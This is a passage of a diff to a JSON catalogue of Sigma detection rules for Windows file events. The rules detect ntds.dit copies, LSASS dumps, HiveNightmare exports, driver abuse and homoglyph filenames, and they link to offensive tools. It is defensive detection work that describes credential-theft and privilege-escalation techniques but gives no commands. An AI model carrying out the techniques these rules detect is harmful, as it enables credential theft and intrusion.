"value": "Potential Binary Or Script Dropper Via PowerShell.EXE"
},
- {
- "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2022/01/11",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "file_event_win_susp_ntds_dit.yml",
- "level": "high",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/",
- "https://adsecurity.org/?p=2398",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.002",
- "attack.t1003.003"
- ]
- },
- "related": [
- {
- "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "11b1ed55-154d-4e82-8ad7-83739298f720",
- "value": "Suspicious Process Writes Ntds.dit"
- },
{
"description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"",
"meta": {
@@ -34845,38 +34621,81 @@
"value": "Potential Privilege Escalation Attempt Via .Exe.Local Technique"
},
{
- "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant",
+ "description": "Detects creation of \".vhd\"/\".vhdx\" files by browser processes.\nMalware can use mountable Virtual Hard Disk \".vhd\" files to encapsulate payloads and evade security controls.\n",
"meta": {
- "author": "@41thexplorer",
- "creation_date": "2018/11/20",
+ "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'",
+ "creation_date": "2021/10/25",
"falsepositive": [
- "Unlikely"
+ "Legitimate downloads of \".vhd\" files would also trigger this"
],
- "filename": "file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml",
- "level": "critical",
+ "filename": "file_event_win_vhd_download_via_browsers.yml",
+ "level": "medium",
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/DrunkBinary/status/1063075530180886529",
- "https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml"
+ "https://redcanary.com/blog/intelligence-insights-october-2021/",
+ "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/",
+ "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_vhd_download_via_browsers.yml"
],
"tags": [
- "attack.execution",
- "attack.t1218.011"
+ "attack.resource_development",
+ "attack.t1587.001"
]
},
"related": [
{
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "related-to"
}
],
- "uuid": "3a3f81ca-652c-482b-adeb-b1c804727f74",
- "value": "APT29 2018 Phishing Campaign File Indicators"
+ "uuid": "8468111a-ef07-4654-903b-b863a80bbc95",
+ "value": "VHD Image Download Via Browser"
+ },
+ {
+ "description": "Detects creation of a file named \"ntds.dit\" (Active Directory Database) by an uncommon process or a process located in a suspicious directory",
+ "meta": {
+ "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2022/01/11",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "file_event_win_ntds_dit_uncommon_process.yml",
+ "level": "high",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "https://adsecurity.org/?p=2398",
+ "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_process.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.002",
+ "attack.t1003.003"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "11b1ed55-154d-4e82-8ad7-83739298f720",
+ "value": "NTDS.DIT Creation By Uncommon Process"
},
{
"description": "Detects files written by the different tools that exploit HiveNightmare",
@@ -34891,10 +34710,10 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/cube0x0/status/1418920190759378944",
+ "https://github.com/FireFart/hivenightmare/",
"https://github.com/GossiTheDog/HiveNightmare",
"https://github.com/WiredPulse/Invoke-HiveNightmare",
- "https://github.com/FireFart/hivenightmare/",
- "https://twitter.com/cube0x0/status/1418920190759378944",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml"
],
"tags": [
@@ -34928,9 +34747,9 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/",
- "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53",
"https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/",
+ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53",
+ "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml"
],
"tags": [
@@ -34980,11 +34799,11 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
+ "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles",
+ "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/",
"https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations",
"https://twitter.com/luc4m/status/1073181154126254080",
"https://twitter.com/malwrhunterteam/status/1235135745611960321",
- "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/",
- "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml"
],
"tags": [
@@ -35050,8 +34869,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy",
"https://twitter.com/0gtweet/status/1465282548494487554",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml"
],
"tags": [
@@ -35164,11 +34983,11 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/helpsystems/nanodump",
- "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/",
"https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml",
- "https://www.google.com/search?q=procdump+lsass",
+ "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/",
"https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf",
+ "https://www.google.com/search?q=procdump+lsass",
+ "https://github.com/helpsystems/nanodump",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_dump.yml"
],
"tags": [
@@ -35260,12 +35079,12 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/",
- "https://twitter.com/MaD_c4t/status/1623414582382567424",
"https://labs.withsecure.com/publications/detecting-onenote-abuse",
- "https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/",
- "https://www.trustedsec.com/blog/new-attacks-old-tricks-how-onenote-malware-is-evolving/",
+ "https://twitter.com/MaD_c4t/status/1623414582382567424",
+ "https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/",
"https://app.any.run/tasks/17f2d378-6d11-4d6f-8340-954b04f35e83/",
+ "https://www.trustedsec.com/blog/new-attacks-old-tricks-how-onenote-malware-is-evolving/",
+ "https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml"
],
"tags": [
@@ -35288,8 +35107,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://jpcertcc.github.io/ToolAnalysisResultSheet",
+ "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tool_psexec.yml"
],
"tags": [
@@ -35310,6 +35129,42 @@
"uuid": "259e5a6a-b8d2-4c38-86e2-26c5e651361d",
"value": "PsExec Service File Creation"
},
+ {
+ "description": "Detects creation of a file named \"ntds.dit\" (Active Directory Database) by an uncommon parent process or directory",
+ "meta": {
+ "author": "Florian Roth (Nextron Systems)",
+ "creation_date": "2022/03/11",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "file_event_win_ntds_dit_uncommon_parent_process.yml",
+ "level": "high",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "https://pentestlab.blog/tag/ntds-dit/",
+ "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/",
+ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration",
+ "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.003"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "4e7050dd-e548-483f-b7d6-527ab4fa784d",
+ "value": "NTDS.DIT Creation By Uncommon Parent Process"
+ },
{
"description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs",
"meta": {
@@ -35347,11 +35202,11 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
+ "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles",
+ "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/",
"https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations",
"https://twitter.com/luc4m/status/1073181154126254080",
"https://twitter.com/malwrhunterteam/status/1235135745611960321",
- "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/",
- "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml"
],
"tags": [
@@ -35404,6 +35259,43 @@
"uuid": "5f87308a-0a5b-4623-ae15-d8fa1809bc60",
"value": "Suspicious Files in Default GPO Folder"
},
+ {
+ "description": "Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.\nHack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.\n",
+ "meta": {
+ "author": "Florian Roth (Nextron Systems)",
+ "creation_date": "2023/05/05",
+ "falsepositive": [
+ "Some false positives may occur with legitimate renamed process explorer binaries"
+ ],
+ "filename": "file_event_win_sysinternals_procexp_driver_susp_creation.yml",
+ "level": "high",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/",
+ "https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks",
+ "https://github.com/Yaxser/Backstab",
+ "https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "attack.t1068"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "de46c52b-0bf8-4936-a327-aace94f94ac6",
+ "value": "Process Explorer Driver Creation By Non-Sysinternals Binary"
+ },
{
"description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n",
"meta": {
@@ -35559,8 +35451,8 @@
"logsource.product": "windows",
"refs": [
"Internal Research",
- "https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence",
"https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md",
+ "https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_addin_persistence.yml"
],
"tags": [
@@ -35593,8 +35485,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/",
"https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae",
+ "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_executable_creation.yml"
],
"tags": [
@@ -35614,6 +35506,48 @@
"uuid": "74babdd6-a758-4549-9632-26535279e654",
"value": "Suspicious Executable File Creation"
},
+ {
+ "description": "Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.\nThis is used as an obfuscation and masquerading techniques. Only \"perfect\" homoglyphs are included; these are characters that\nare indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.\n",
+ "meta": {
+ "author": "Micah Babinski, @micahbabinski",
+ "creation_date": "2023/05/08",
+ "falsepositive": [
+ "File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use."
+ ],
+ "filename": "file_event_win_susp_homoglyph_filename.yml",
+ "level": "medium",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "http://www.irongeek.com/homoglyph-attack-generator.php",
+ "https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_homoglyph_filename.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036",
+ "attack.t1036.003"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "4f1707b1-b50b-45b4-b5a2-3978b5a5d0d6",
+ "value": "Potential Homoglyph Attack Using Lookalike Characters in Filename"
+ },
{
"description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675",
"meta": {
@@ -35628,8 +35562,8 @@
"logsource.product": "windows",
"refs": [
"https://github.com/hhlxf/PrintNightmare",
- "https://github.com/cube0x0/CVE-2021-1675",
"https://github.com/afwu/PrintNightmare",
+ "https://github.com/cube0x0/CVE-2021-1675",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml"
],
"tags": [
@@ -35689,10 +35623,10 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79",
- "https://learn.microsoft.com/en-us/office/vba/outlook/concepts/outlook-forms/create-an-outlook-form",
"https://www.slipstick.com/developer/custom-form/clean-outlooks-forms-cache/",
+ "https://learn.microsoft.com/en-us/office/vba/outlook/concepts/outlook-forms/create-an-outlook-form",
"https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=76",
+ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_newform.yml"
],
"tags": [
@@ -36162,11 +36096,11 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
+ "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer",
"https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
"https://labs.f-secure.com/blog/prelude-to-ransomware-systembc",
"https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/",
- "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer",
+ "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml"
],
"tags": [
@@ -36234,22 +36168,25 @@
"logsource.product": "windows",
"refs": [
"https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
+ "https://github.com/samratashok/nishang",
+ "https://github.com/nettitude/Invoke-PowerThIEf",
+ "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
+ "https://github.com/Kevin-Robertson/Powermad",
"https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
+ "https://github.com/DarkCoderSc/PowerRunAsSystem/",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
+ "https://github.com/adrecon/ADRecon",
+ "https://github.com/NetSPI/PowerUpSQL",
+ "https://github.com/S3cur3Th1sSh1t/WinPwn",
+ "https://github.com/AlsidOfficial/WSUSpendu/",
"https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
"https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
- "https://github.com/HarmJ0y/DAMP",
- "https://github.com/samratashok/nishang",
- "https://github.com/AlsidOfficial/WSUSpendu/",
- "https://github.com/nettitude/Invoke-PowerThIEf",
- "https://github.com/DarkCoderSc/PowerRunAsSystem/",
- "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
"https://github.com/besimorhino/powercat",
+ "https://github.com/adrecon/AzureADRecon",
+ "https://github.com/HarmJ0y/DAMP",
"https://github.com/PowerShellMafia/PowerSploit",
- "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
- "https://github.com/S3cur3Th1sSh1t/WinPwn",
"https://github.com/CsEnox/EventViewer-UACBypass",
"https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
- "https://github.com/NetSPI/PowerUpSQL",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml"
],
"tags": [
@@ -36282,9 +36219,9 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/",
"https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html",
"https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html",
+ "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml"
],
"tags": [
@@ -36355,6 +36292,40 @@
"uuid": "7280c9f3-a5af-45d0-916a-bc01cb4151c9",
"value": "Suspicious MSExchangeMailboxReplication ASPX Write"
},
+ {
+ "description": "Detects suspicious file based on their extension being created in \"C:\\PerfLogs\\\". Note that this directory mostly contains \".etl\" files",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/05/05",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "file_event_win_perflogs_susp_files.yml",
+ "level": "medium",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "https://labs.withsecure.com/publications/fin7-target-veeam-servers",
+ "Internal Research",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_perflogs_susp_files.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "bbb7e38c-0b41-4a11-b306-d2a457b7ac2b",
+ "value": "Suspicious File Created In PerfLogs"
+ },
{
"description": "Detects processes creating temp files related to PCRE.NET package",
"meta": {
@@ -36500,8 +36471,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://persistence-info.github.io/Data/powershellprofile.html",
"https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/",
+ "https://persistence-info.github.io/Data/powershellprofile.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml"
],
"tags": [
@@ -36849,8 +36820,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/",
"https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd",
+ "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_msdt_susp_directories.yml"
],
"tags": [
@@ -36885,8 +36856,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/",
"https://github.com/klinix5/InstallerFileTakeOver",
+ "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml"
],
"tags": [
@@ -36954,10 +36925,10 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008",
"https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html",
- "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml",
+ "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008",
"https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/",
+ "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"
],
"tags": [
@@ -36990,9 +36961,9 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
+ "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs",
"https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs",
"https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
- "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_inveigh_artefacts.yml"
],
"tags": [
@@ -37026,8 +36997,8 @@
"logsource.product": "windows",
"refs": [
"https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute",
- "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw",
"https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g",
+ "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml"
],
"tags": [
@@ -37051,9 +37022,9 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/",
"https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html",
"https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html",
+ "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml"
],
"tags": [
@@ -37126,8 +37097,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/outflanknl/Dumpert",
"https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/",
+ "https://github.com/outflanknl/Dumpert",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_dumpert.yml"
],
"tags": [
@@ -37194,8 +37165,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py",
"https://github.com/Porchetta-Industries/CrackMapExec",
+ "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_cred_dump.yml"
],
"tags": [
@@ -37248,6 +37219,40 @@
"uuid": "0b9ad457-2554-44c1-82c2-d56a99c42377",
"value": "Anydesk Temporary Artefact"
},
+ {
+ "description": "Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/05/05",
+ "falsepositive": [
+ "Some false positives may occur with legitimate renamed process monitor binaries"
+ ],
+ "filename": "file_event_win_sysinternals_procmon_driver_susp_creation.yml",
+ "level": "medium",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "Internal Research",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_procmon_driver_susp_creation.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "attack.t1068"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839",
+ "tags": [
